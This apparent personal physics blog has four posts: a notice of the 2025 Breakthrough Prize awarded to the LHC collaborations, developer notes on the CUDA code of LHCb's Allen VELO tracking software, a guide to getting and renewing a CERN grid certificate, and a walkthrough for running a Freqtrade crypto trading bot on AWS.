Fotis I. Giasemis

The 2025 Breakthrough Prize in Fundamental Physics Awarded to the LHCb Collaboration

2025-04-08T00:00:00+00:00

The LHCb collaboration, together with the other three main Large Hadron Collider collaborations, ATLAS, CMS and ALICE, has been awarded the 2025 Breakthrough Prize in Fundamental Physics:

For detailed measurements of Higgs boson properties confirming the symmetry-breaking mechanism of mass generation, the discovery of new strongly interacting particles, the study of rare processes and matter-antimatter asymmetry, and the exploration of nature at the shortest distances and most extreme conditions at CERN’s Large Hadron Collider.

The prize has been awarded to all current and former members of the four collaborations who have authored Run 2 data papers by 15 July 2024.

As stated in the official page, the $3 million prize is allocated to ATLAS ($1 million), CMS ($1 million), ALICE ($500,000) and LHCb ($500,000). The prize money will be used by the collaborations to offer grants for doctoral students from member institutes to spend research time at CERN, giving the students experience working at the forefront of science and new expertise to bring back to their home countries and regions. The name of each winner can be found on the experiment pages below.

The full list of the LHCb laureates, can be found in the LHCb subpage.

Read more in the prize announcement and in the CERN press release.

Notes on the Allen Codebase for New Developers

2024-02-22T00:00:00+00:00

This post is meant to give extra comments and notes on the Allen codebase. For more introductory materials see the Allen GitLab and documentation. The CUDA GNU debugger is highly recommended for exploring and understanding the codebase.

Structure of Data in Allen

Essentially data in Allen are stored in 1-dimensional arrays. Hence, if we have many events, we need “offsets”, to know where specifically the data of interest can be found within this 1-dimensional array.

Pointers to Data in Allen

For example let’s look at SearchByTriplet.cu:

__global__ void velo_search_by_triplet::velo_search_by_triplet(
  velo_search_by_triplet::Parameters parameters,
  const VeloGeometry* dev_velo_geometry)
{
  // Shared memory size is a constant, enough to fit information about three module pairs.
  __shared__ Velo::ModulePair module_pair_data[3];

  // Initialize event number and number of events based on kernel invoking parameters
  const unsigned event_number = parameters.dev_event_list[blockIdx.x];
  const unsigned number_of_events = parameters.dev_number_of_events[0];

  // Pointers to data within the event
  const unsigned total_estimated_number_of_clusters =
    parameters.dev_offsets_estimated_input_size[Velo::Constants::n_module_pairs * number_of_events];
  const unsigned* module_hit_start =
    parameters.dev_offsets_estimated_input_size + event_number * Velo::Constants::n_module_pairs;
  const unsigned* module_hit_num = parameters.dev_module_cluster_num + event_number * Velo::Constants::n_module_pairs;
  const unsigned hit_offset = module_hit_start[0];

  const auto velo_cluster_container =
    Velo::ConstClusters {parameters.dev_sorted_velo_cluster_container, total_estimated_number_of_clusters, hit_offset};

  const unsigned tracks_offset = Velo::track_offset(parameters.dev_offsets_estimated_input_size, event_number);
  Velo::TrackHits* tracks = parameters.dev_tracks + tracks_offset;
  Velo::TrackletHits* three_hit_tracks = parameters.dev_three_hit_tracks + tracks_offset;

  Velo::TrackletHits* tracklets = parameters.dev_tracklets + event_number * Velo::Constants::max_tracks_to_follow;
  unsigned* tracks_to_follow = parameters.dev_tracks_to_follow + event_number * Velo::Constants::max_tracks_to_follow;

  bool* hit_used = parameters.dev_hit_used + hit_offset;
  uint16_t* h1_rel_indices = parameters.dev_rel_indices + hit_offset;

  unsigned* dev_atomics_velo = parameters.dev_atomics_velo + event_number * Velo::num_atomics;

  unsigned first_module_pair = Velo::Constants::n_module_pairs - 1;
...
...
...

We need to have the number of events we will be analyzing, and the number of the current event we are focusing on, since events are treated in separate CUDA blocks inside Allen.

const unsigned event_number = parameters.dev_event_list[blockIdx.x];
const unsigned number_of_events = parameters.dev_number_of_events[0];

We also need pointers to the hits of the current event.

const unsigned total_estimated_number_of_clusters =
  parameters.dev_offsets_estimated_input_size[Velo::Constants::n_module_pairs * number_of_events];
const unsigned* module_hit_start =
  parameters.dev_offsets_estimated_input_size + event_number * Velo::Constants::n_module_pairs;
const unsigned* module_hit_num = parameters.dev_module_cluster_num + event_number * Velo::Constants::n_module_pairs;
const unsigned hit_offset = module_hit_start[0];

As well as pointers to the tracks of the current event.

const unsigned tracks_offset = Velo::track_offset(parameters.dev_offsets_estimated_input_size, event_number);
Velo::TrackHits* tracks = parameters.dev_tracks + tracks_offset;
Velo::TrackletHits* three_hit_tracks = parameters.dev_three_hit_tracks +

For this we use Velo::track_offset defined in VeloEventModel.cuh.

...
...
  /**
   * @brief Returns the track offset of an event. //
   */
  __host__ __device__ inline unsigned track_offset(const unsigned* offsets, const unsigned event_number)
  {
    const auto offset_event = offsets[event_number * Velo::Constants::n_module_pairs];
    return offset_event * Velo::Constants::max_number_of_tracks_per_cluster;
  }
} // namespace Velo

Looping Over VELO Clusters in Allen

First you parallelize in the number of events, by calling the CUDA kernel with a number of blocks equal to the number of the events, and you choose the event number using const unsigned event_number = parameters.dev_event_list[blockIdx.x];.

In order to access the VELO clusters in an event I used velo_cluster_container, using velo_cluster_container.x(index) etc. The question then was how to know the total number of clusters in the event. And for that you can use

const auto event_number_of_clusters =
  parameters.dev_offsets_estimated_input_size[(event_number + 1) * Velo::Constants::n_module_pairs] - 
  parameters.dev_offsets_estimated_input_size[event_number * Velo::Constants::n_module_pairs];

where parameters.dev_offsets_estimated_input_size[event_number * Velo::Constants::n_module_pairs]; gives the number of clusters for all the events before the current event, and parameters.dev_offsets_estimated_input_size[(event_number + 1) * Velo::Constants::n_module_pairs]; gives the number of clusters for all the events including the “current” event.

Notes on the `make_velo_tracks()` Function

File: velo_reconstruction.py.
Paper: A fast local algorithm for track reconstruction on parallel architectures.
First we initialize the number of events with number_of_events = initialize_number_of_events(). Implementation: HostInitNumberOfEvents.cpp.
Then we decode the information from the Velo, with decode_velo() and store it in decoded_velo. See decode_velo().
velo_search_by_triplet takes the information from the decoding, i.e. the normal clusters etc. and contructs all the tracks, using the search by triplet algorithm. Implementaiton: SearchByTriplet.cu.
prefix_sum_offsets_velo_tracks is an implementation of prefix sum on the host. Implementation: HostPrefixSum.cpp.

prefix_sum_offsets_velo_tracks = make_algorithm(
	host_prefix_sum_t,
	name="prefix_sum_offsets_velo_tracks",
	dev_input_buffer_t=velo_search_by_triplet.dev_number_of_velo_tracks_t,
)

Specifically, we take the variable dev_number_of_velo_tracks, which is simply an array containing the number of tracks we have for each event passed to Allen, and we compute the prefix sum of this array, i.e. the offsets, in order to be more computationally efficient later on.

velo_three_hit_tracks_filter is the weak track filter algorithm, which operates on three-hit tracks, and appends them to the final tracks container given that two conditions are met. For more details see the paper.
prefix_sum_offsets_number_of_three_hit_tracks_filtered does, exactly as above, the prefix sum on the velo_three_hit_tracks_filter output.
velo_copy_track_hit_number copies Velo track hit numbers on a consecutive container. Implementation: VeloCopyTrackHitNumber.cu.
prefix_sum_offsets_velo_track_hit_number does again, exactly as above, the prefix sum on the velo_copy_track_hit_number output.
Finally, velo_consolidate_tracks consolidates the tracks. Implementation: VeloConsolidateTracks.cu

Notes on the Search by Triplet Algorithm

Important files: VeloDefinitions.cuh, VeloEventModel.cuh.

In VeloDefinitions.cuh:
- VELO geometry:
  1. 52 modules
  2. 26 module pairs
  3. 4 sensors per module
  4. 8 senors per module pair
- max_track_size = 26

Important Local Variables

The search_by_triplet kernel is run with the configuration below.

velo_search_by_triplet::velo_search_by_triplet<<<(7,1,1),(64,1,1)>>>

Meaning the events are processed in 7 independent CUDA blocks of execution, and each CUDA block has 64 threads.

event_number: The number of the specific event currently being processed, e.g. here event_number = 0, …, event_number = 6, with -n 7.
number_of_events: The number of events passed to Allen with -n flag, e.g. here number_of_events = 7, with -n 7.
total_estimated_number_of_clusters: The total number of clusters, across all of the events passed, e.g. for -n 2, and for the first event having 1,500 hits and the second 2,000, then total_estimated_number_of_clusters=3500. Here total_estimated_number_of_clusters = 15945.
module_hit_start: The hits (15945 for -n 7) are stored all together. Also, the hits are stored by-module. So for 7 events, we have 26 module-pairs, hence 26*7 = 182 different module_hit_start. For this reason, module_hit_start[182] = 15945. Dereferencing past this index does not throw an error but all the values are garbage (left-over) values.
The VELO detector has 26 module pairs.

Velo::Constants::n_module_pairs = 26

module_hit_num: The number of hits that each module has. Again, for 7 events, we have 26 module-pairs, hence 26*7 = 182 different module_hit_num. For this reason, for an index between 0 and 181 inclusive, you get module_hit_num[index] ~ 100, i.e. each module, in each event, has roughly 100 hits. Dereferencing past this index does not throw an error but all the values are garbage (left-over) values.
hit_offset = module_hit_start[0]: The offset past which the hits are the hits related to the current event.
velo_cluster_container: The (sorted-by-phi) container of all the Velo clusters (hits), from all the events. To initialize, we also need to pass the total number of clusters we have, here 15945, and the hit_offset, to be able to access the hits of the current event.

const auto velo_cluster_container =
    Velo::ConstClusters {parameters.dev_sorted_velo_cluster_container, total_estimated_number_of_clusters, hit_offset};

For the type Velo::ConstClusters see VeloEventModel.cuh.

Velo::TrackHits* tracks: Contains the hits of all the tracks, from all the events.
Velo::TrackHits: Structure containing indices to hits within hit array. See VeloEventModel.cuh.
tracks_offsets: The offset to reach the tracks associated with the current event.
hit_used: Boolean array, where you store whether a hit has been used to form a track or not.

Important Global Variables

host_number_of_events: The number of events passed to Allen with -n flag, on the host.
dev_number_of_events: The number of events passed to Allen with -n flag, on the device.
host_total_number_of_velo_clusters_t: The total number of clusters, across all of the events passed.
dev_sorted_velo_cluster_container_t: The (sorted-by-phi) container of all the Velo clusters (hits), from all the events.
dev_offsets_estimated_input_size_t: Array containing the offsets for the clusters of each event, inside the cluster container.
dev_module_cluster_num_t: Array containing the number of clusters that each module has, across all the events passed.
dev_number_of_velo_tracks_t: Array containing the number of tracks we have for each event passed to Allen. So for -n 7 this array has length of 7.
dev_atomics_velo: Atomic operations/variables are used in concurrent programming to ensure the consistency and integrity of shared data structures.

In the VELO we seem to need 3 types of atomic variables:

namespace atomics {
      enum atomic_types { number_of_three_hit_tracks, tracks_to_follow, local_number_of_hits };
    }

That is why Velo::num_atomics = 3, see VeloDefinitions.cuh. Hence, dev_atomics_velo is an array, that contains, for each event, the values for these 3 atomic variables. And here is an example of performing one of these atomic operations (atomicAdd).

const auto track_number =
        atomicAdd(dev_atomics_velo + atomics::tracks_to_follow, 1) % Velo::Constants::max_tracks_to_follow;

Notes on the `VeloCopyTrackHitNumber` Algorithm

event_tracks: Contains the tracks of the events, all together.
tracks_offset: The offset you need to reach the tracks associated to the current event.
number_of_tracks: The number of tracks in the current event.
accumulated_tracks: The number of tracks in the current event, including the special three-hit tracks, from the weak track filter algorithm.
Tracks can contain up to a maximum number of hits, specifically 26, since max_track_size = 26. Therefore, when I print a track,

(cuda-gdb) print event_tracks[0]          
$86 = {hits = {2641, 2546, 2442, 2340, 34, 0, 21, 0, 9, 0, 6, 0, 11, 0, 37, 0, 25, 0, 41, 0, 27, 0, 40, 0, 31, 0}, hitsNum = 4 '\004'}

the length of this array, is always fixed to 26. The length of the track however is hitsNum = 4, hence only the first 4 values are significant, viz. {2641, 2546, 2442, 2340}. The rest of the hits in the array are garbage values.

Another example below.

(cuda-gdb) print event_tracks[100]
$94 = {hits = {2111, 1995, 1876, 1740, 1617, 1503, 1394, 1289, 1188, 1101, 1003, 0, 1378, 0, 1371, 0, 1373, 0, 1368, 0, 1372, 0, 1374, 0, 1375, 0}, 
  hitsNum = 11 '\v'}

velo_track_hit_number: For each track in the current event, we have an array that contains the number of hits in this track, i.e. the lengths of the track.
__global__ void velo_copy_track_hit_number::velo_copy_track_hit_number: Copies Velo track hit numbers on a consecutive container.

Notes on the `VeloConsolidateTracks.cu` Algorithm

event_number_of_tracks_in_main_track_container: The number of tracks, from the search by triplet algorithm, for the current event.
event_number_of_three_hit_tracks_filtered: The number of tracks, from the weak track filter, for the current event.
event_total_number_of_tracks = event_number_of_tracks_in_main_track_container + event_number_of_three_hit_tracks_filtered

Obtaining and Renewing a CERN Grid Certificate in LHCb

2023-02-05T00:00:00+00:00

Working with LHCb resources requires a valid grid certificate. Here’s a step-by-step guide for obtaining and renewing your certificate, tailored for lxplus and LHCb DIRAC access.

Obtaining a Certificate

Instructions: Official LHCb Certificate Guide

Use Firefox — Chrome and other browsers may not work well for certificate management.
Import all required certificates into Firefox (as described in the link above).
Import your personal certificate into Firefox. You’ll be prompted to set an import password — remember it!

Transfer the certificate to your lxplus account:

scp MyCertificate.p12 username@lxplus.cern.ch:

SSH into lxplus:
```
ssh -Y username@lxplus.cern.ch
```
Convert the certificate to PEM format (you’ll be asked to set a PEM passphrase — use a different one than the import password):
```
lb-dirac dirac-cert-convert MyCertificate.p12
```
Join the LHCb Virtual Organisation (VO) via the VOMS registration page. You may need to wait ~24 hours for validation.
Once validated, initialize your proxy on lxplus:
```
lhcb-proxy-init
```
Enter your PEM passphrase when prompted.

✅ You now have access to the LHCb DIRAC portal.

Renewing a Certificate

Download your renewed certificate from the CERN Certification Authority.

Transfer it to lxplus:

scp NewCertificate.p12 username@lxplus.cern.ch:

In Firefox, delete the old certificate and import the new .p12 one.
Update your IAM profile:
- Visit IAM Profile
- Under X.509 certificates, unlink the old certificate.
- Then, link the new certificate you just imported.
On lxplus, clear your previous credentials:
```
rm -rf ~/.globus
```

Convert the new certificate to PEM as before:

lb-dirac dirac-cert-convert NewCertificate.p12

Test your setup: Follow this checklist to ensure everything is working.
Optionally run:
```
lhcb-dirac
```
Finally, reinitialize your proxy:
```
lhcb-proxy-init
```

✅ You have renewed your certificate.

Deploying a Crypto Trading Bot to Test Strategies on Cryptocoins

2022-03-22T00:00:00+00:00

Automated crypto trading can save time, eliminate emotions, and optimize your strategies. In this guide, we’ll walk through setting up a fully functional trading bot using Freqtrade—an open-source crypto trading framework—and deploy it on the AWS cloud.

Getting Started: Building the Bot

To get your bot up and running, you can follow either of these resources:

The official Freqtrade Documentation
This practical Udemy Course that walks you through building a bot from scratch

Deploying on AWS Cloud

Here’s a step-by-step guide to deploy your bot using AWS EC2:

Create an AWS Account
Head over to AWS and register.
Launch a Debian-Based EC2 Instance
Choose a lightweight Debian-based Linux AMI and generate a key pair (.pem file).
Connect to the EC2 Instance
Use your terminal to SSH into your instance:
```
ssh -i "KeyPair.pem" admin@
```
Install Freqtrade
Follow the installation steps from the Freqtrade Installation Guide.

Tip: Make sure you meet all the system requirements before proceeding.
Activate the Virtual Environment
Once installed, activate the Python virtual environment:
```
source ./.env/bin/activate
```
Configure the Bot
Set up your bot by generating a new config file:
```
freqtrade new-config
```
This will create a config.json where you’ll add your exchange and trading parameters.
Connect to a Crypto Exchange
- Generate your API key and secret from an exchange like Binance or Kraken.
- Input these into your config.json to enable live trading or paper trading.
Telegram Integration (Optional but Recommended)
- Create a Telegram bot and get its token.
- Find your Telegram chat ID.
- Add both to the config file to monitor and control the bot via Telegram.
Keep the Bot Running After Disconnection
Use screen to keep the bot running even if you close your terminal:
```
screen
```
Start your bot, then detach with:
```
Ctrl + A, then D
```
To resume:
```
screen -r
```
More info here: Keep SSH Sessions Alive

Limitations & Considerations

No Short Selling: Freqtrade only supports buying/selling spot pairs, not margin or futures.
No Market-Neutral Strategies: Since you can’t short or access perpetual contracts, strategies like arbitrage or funding rate exploitation aren’t feasible.
Market Risk: Automated doesn’t mean risk-free. Backtest thoroughly before going live.

Final Thoughts

Freqtrade is a powerful tool for algorithmic crypto trading, especially for those with some coding experience. Combined with AWS, it offers a scalable and low-cost setup for your bot — whether you’re just experimenting or looking to automate a production-level strategy.

Have you built your bot already? What strategy are you running? Share in the comments!